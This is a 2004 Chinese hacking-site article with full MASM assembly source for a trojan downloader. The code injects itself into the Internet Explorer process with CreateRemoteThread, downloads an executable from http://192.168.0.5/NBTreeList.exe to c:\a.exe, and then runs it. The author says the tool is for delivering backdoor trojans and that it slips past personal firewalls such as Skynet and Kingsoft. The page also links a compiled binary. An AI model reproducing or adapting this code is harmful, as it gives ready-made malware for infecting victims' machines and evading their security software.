首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
注入下载文件的代码到IE进程然后执行下载的文件
来源:vfocus.net 作者:vfocus 发布时间:2004-07-21  

注入下载文件的代码到IE进程然后执行下载的文件


大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)
所以写了这个程序。。。。
下载地址

http://www.chinansl.com/czy/bin.rar

程序还要改下才好用哈,不过只有2kb很小了。。。。

编绎参数:
C:\masm32\BIN>type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj

刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。


; #--------------------------------------# #
; # Injection downloadcode in IE --> # #
; # -->also it can jump personal fire wall # #
; # 2004.07.15 #
; # codz: czy # #
; #------------------------------------------# #

;test on win2k server sp4 masm8

.386
.model flat,stdcall
option casemap:none

include ../include/user32.inc
includelib ../lib/user32.lib
include ../include/kernel32.inc
includelib ../lib/kernel32.lib
include ../include/windows.inc


.data
hello db '2K下建远程线程',0
tit db 'IEFrame',0
szFormat db 'PID是:%d',0
szBuffer dd 20 dup(0),0
pid dd 0
hProcess dd 0
hThread dd 0
pCodeRemote dd 0
path1 db 'c:\a.EXE',0

.const
szmsg db 'URLDownloadToFileA',0
userdll db 'Urlmon.dll',0
;szmsg db 'MessageBoxA',0
;userdll db 'User32.dll',0
szloadlib db 'LoadLibraryA',0 ;注意和LoadLibraryW的区别哟
kerdll db 'kernel32.dll',0

.code
codebegin:
dispdata db "http://192.168.0.5/NBTreeList.exe",0
szTit db "c:\a.exe",0
datalen =$-codebegin
Rproc proc msgbox ;MessageBoxA的地址为参数
CALL @F ;push esi
@@:
POP EBX
SUB EBX,OFFSET @B
LEA ECX,[EBX+dispdata]
LEA EDX,[EBX+szTit]
push NULL
push 0
push edx
push ecx
push NULL
call msgbox
ret ;重要
Rproc endp
codelen =$-codebegin ;代码长度xx字节

start:
;invoke FindWindow,0,offset tit ;返回计算器窗口句柄
invoke FindWindow,offset tit,0
invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号
;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄
mov hProcess,eax ;保存进程句柄


invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pCodeRemote,eax
invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL

mov esi,pCodeRemote
add esi,datalen
push esi
invoke LoadLibrary,offset userdll
invoke GetProcAddress,eax,offset szmsg
pop esi
invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0

mov hThread,eax ; 返回线程句柄
.if hThread
invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束
invoke CloseHandle,hThread ;关闭线程句柄
.endif

invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间
invoke CloseHandle,hProcess ;关闭进程句柄
invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。
;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1
invoke ExitProcess,0
end start



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Advanced SQL Injection with My
·分析盛大被黑
·对iis写权限的利用
·windows POSIX 子系统权限提升漏
·利用PStore获取帐号信息
·脚本图片类后门的完美使用方法实
·谈php+mysql注射语句构造
·最后的战役--[第三次注入中国黑
·入侵网站后全自动安装后门
·对cfm的一个攻击实例
·跨站式SQL注入
·Guest权限突破8法
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved